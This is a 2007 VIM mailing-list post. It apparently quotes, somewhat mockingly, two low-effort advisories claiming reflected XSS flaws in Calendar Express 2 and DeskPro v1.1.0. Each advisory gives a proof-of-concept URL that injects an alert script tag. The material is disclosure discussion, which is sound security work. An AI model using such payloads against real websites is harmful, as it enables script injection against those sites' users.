[VIM] Sigh

J. M. Seitz jms at bughunter.ca
Thu Feb 15 13:53:30 EST 2007


So, I would change "Grep n Gripe" to "Grep n Gripe Pipe mail".

JS

 

hey guys .. check out this new xss i just found ;P

Vulnerable : Calendar Express 2

web :  <http://www.ci.emeryville.ca.us/calendar>
http://www.ci.emeryville.ca.us/calendar,
<http://www.phplite.com/products/calendarexpress/>
http://www.phplite.com/products/calendarexpress/

 

XSS :

 
<http://127.0.0.1/calendar/search.php?allwords=%22%3E%3Cscript%3Ealert%28%27
bl4ck%27%29%3C%2Fscript%3E&cid=1&title=1&desc=1>
http://127.0.0.1/calendar/search.php?allwords=%22%3E%3Cscript%3Ealert%28%27b
l4ck%27%29%3C%2Fscript%3E&cid=1&title=1&desc=1

 

################################

Discovered By BLacK ZeRo

K.S.A

bL4ck at bsdmail.org

################################

Best regards ,,

 

 

hey guys .. check out this new xss i just found ;P

Vulnerable : deskpro.com v1.1.0

web :  <http://www.deskpro.com/> http://www.deskpro.com,
<http://customers.qwk.net/> http://customers.qwk.net Version : v1.1.0

XSS :

 <http://127.0.0.1/dp/faq.php?article=><script>alert('bl4ck')</script>
http://127.0.0.1/dp/faq.php?article="><script>alert('bl4ck')</script>

 

################################

Discovered By BLacK ZeRo

K.S.A

bL4ck at bsdmail.org

################################

Best regards ,,

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://www.attrition.org/pipermail/vim/attachments/20070215/e39ce3ed/attachment-0001.html 


More information about the VIM mailing list